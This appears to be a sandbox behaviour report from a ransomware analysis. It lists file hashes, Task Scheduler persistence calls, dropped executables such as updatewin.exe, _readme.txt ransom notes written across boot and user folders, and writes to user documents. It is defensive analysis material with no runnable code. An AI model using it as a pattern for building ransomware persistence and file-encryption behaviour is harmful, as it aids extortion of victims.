C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\WTnDwa-D4KBHQUw.mkv 55.95 KB MD5: 7be30b8350409eb6de6eb495e5c9d991
SHA1: 11b5f4c601981f3b90870e8e4f484d40ae18902e
SHA256: 3cb0b35f5fa681bce496ed30ef79c01afc7f97ae1511032ed828d3f16d5507e7
SSDeep: 1536:5TYsHAurOh8lJytwK1lk5TbYznbnIMrbtpN3p:KsHfCiOtwK1lk5TO0Mrb7NZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat 32.08 KB MD5: 2cc8f2785c04cbcb7ef69509145697b1
SHA1: 6edc2fedfc8dc9c233501b2bf5b3e52ce7ca0c09
SHA256: 02716ed5a14314ce70ddd73a4e9bee9cdbb5d37c2827cdab0eab02b26dafbd0c
SSDeep: 768:ONbJmwfjcwgu3ZEEgSnRj6T7hOhpVwLURs3S2ip6EQ9c9kkaeB:ONtmwfHLicj6T7hO3wURIuQISG
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab 568.17 KB MD5: f460821c3471f984d66d79f7cba1fc7c
SHA1: 2ef4d82abd9410c35821121f551ed48f45b06d70
SHA256: a407a24ac88cbd0968c390d8a7ddac78b9aaf528fbc59eece8e89f9a55bbd159
SSDeep: 12288:mmkeVqwDAjfMl6jY4hyMPezVNK9TcS5RyjDUI6Eh/MOhT/:FDAjk/MPgyTx6jDUbE2IT
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab 24.17 MB MD5: 9db44901600b9cf38610af6673b69a99
SHA1: 500ef277d27034ec9cedc606808b0aea2a2c97d7
SHA256: 42dbd6070541a7ca8a605e98e13192cc887a6f6b14c5cb8cb976194da89c0cba
SSDeep: 196608:JWdNm7l//upum9uxpfp4uZ8q7zEqaZswqLhQTcvlj9/z2H7DLKH8:Tl//upum9QtEqaeqc3/iH3mH8
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi 885.58 KB MD5: a6bab5f48e2003b8fd4888abe8ed859f
SHA1: 4643e1a03259553c6d046c4dbde6cf4d31168c5d
SHA256: 81e17a5f0674ddba1446f80085a7b97edc7dd29a5b02234e7f995406cefc1900
SSDeep: 6144:+5E74HldkIMU+pHA5BktGnGj2QELvMYI2q3ksedyPs3ETGpyIQEkmt3PNXMRiWRJ:+5E7i6IMU+GDo4nikseAPsJpfjt3PEX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\dH-l6u.avi 93.62 KB MD5: 2458a128ee9f8530f6481f860afc365b
SHA1: 14905b242cefe967dc4358be88c2037d7474f8e4
SHA256: 1ebcb1647dd3e81cfcdbaf36bbf4e9ac618f2ef788f4425aec3017514d08d7dd
SSDeep: 1536:craAoLA8vfhOXonhf4I/LCrJYT9ckOoUlDu3jS3JPqQrlpJApFG3VH2HJQRuWt06:c5oLA8qoJ4SCrJ+9cpi8lfpJiFMzRfIw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\aqq4ZugPM-uIfNTNxref\3YQcDZAJgPao0vK26HVe\ziyBrxM6Ba3SqMjEYO.avi 10.26 KB MD5: 2019f38fce8c60d7ebc8f5a1b12c4158
SHA1: 748b85b4b38e29664fcb3e0320811d3ce5a86fb4
SHA256: 213e9559e79ac806d9ff1a6b76f7ad306d5062018d5522bba1a804f3f018d6c2
SSDeep: 192:tZ96xCRZG7a1OvlRly7vau7y30j/tL6zjyT7c72rdBDZGKHfD0AEsD:X0cqac9RlICu23g/ouT7OedBDZGAD0AF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\0KK-LJo0NlWa\-upHLx loeeu-TB.mkv 23.89 KB MD5: a8f8d5d0035cf9360ee5cfd1ff14a88f
SHA1: 3e88319a34b55fa769834027f3d6a5d4f12e7f25
SHA256: 1e193d742b0526889cb6cda6a8cb9df18e6c2a8c0c381a47e1d56f17b844c998
SSDeep: 384:QP1nYBUyqY1vZqGFp9BtplszJDUQ4HG9G0BQISjIqqk3mKhKnMOHh0avm/uCCql7:I1nYBUyqyBXplWh9M04Iq73FKxJuKql7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\f NqUp5_D7sMGe.flv 10.88 KB MD5: 1612bb634c3873cf0d8b08f6fcfc7d19
SHA1: baf88c0250842293a018b2ef7fbc2c3d234e74be
SHA256: e99d9c905e851cb7c1e3b4708acd1bcb5253e4c8e3c3dde4107ef325a4584e57
SSDeep: 192:Kq8LkyUACPwTYulzQ/sQG297gr7jla85XYehYDKfuoWiel/I09YgLoFU/JSX:KqOUJPwsu+/sQG2B85IZDKxBYoyIX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\tEhXK0.mp4 74.60 KB MD5: 2273cfffe5111241ad592dcaac13822b
SHA1: 524a38ecd2083abe3f1f0cb363565617dc30263f
SHA256: a40b8b87ea8a7341197a773a8e4c960fe68b19c067679efe7bd15eddf81e20a5
SSDeep: 1536:bVXvPL8E4QuGmDBjBl7j5QELPnz0u7DFQc/LYURzdUmLamgQDE:bV/TkjD9fn5LQrcjYUgmmkDE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\2odT1K\VuM2\VehoR9xPCLy8\IAQDAF9mflNWLRgoJL\yboEd.avi 83.09 KB MD5: ec3224719642c445af786fced2ca8607
SHA1: 6e9585a17c4fcbaf654daede5f5b5524462f8d51
SHA256: 491947f9139265434514c314f66e84146a6828fcc6bc31c3eff6cb4081e7b5c9
SSDeep: 1536:GUVCZSc4z3DOqLWvwmTVI1fkCHBoVUBvQDHebs+X4iE3M1Evzq3:hCZSpOqLF2CHBoVEOHebs+XmMyG3
False
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-07-08T16:48:24 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (1769)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\SystemID\PersonalID.txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\SystemID\PersonalID.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin2.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Config.Msi\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\cs-CZ\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\da-DK\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\de-DE\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\el-GR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\en-US\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\es-ES\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\fi-FI\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\Fonts\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\fr-FR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\hu-HU\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\it-IT\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ja-JP\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ko-KR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\nb-NO\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\nl-NL\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pl-PL\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pt-BR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\pt-PT\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\ru-RU\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\sv-SE\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\tr-TR\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-CN\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-HK\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Boot\zh-TW\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\BOOTSECT.BAK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\BCD.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\BCD.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\BOOTSTAT.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Boot\memtest.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\cs-CZ\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\da-DK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\de-DE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\el-GR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\memtest.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\es-ES\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fi-FI\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\chs_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\cht_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\jpn_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\kor_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\wgl4_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fr-FR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\hu-HU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\it-IT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ja-JP\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ko-KR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nb-NO\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nl-NL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pl-PL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-BR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-PT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ru-RU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\sv-SE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\tr-TR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-CN\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-HK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-TW\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\7FXGdv.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fn3wxYGSmK_5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KdF36F.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kKP8D1f.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OjEEOfskM8q.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pdn3smOfWiyL_KFEcP0.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xe1YhHNVlwT k.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_34_nkr.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\2 YiCSGLLTlIDeQ.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3fgk.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\3kKQ7nGkbpOOq-1 5zRt.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\45LEiyxnf Plrmb.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5Jnu XQUnVKH6.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5W-053pafC.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\AGokm2hLuNsPkZ.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\BUziw_klSFTDwvC1Vm.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
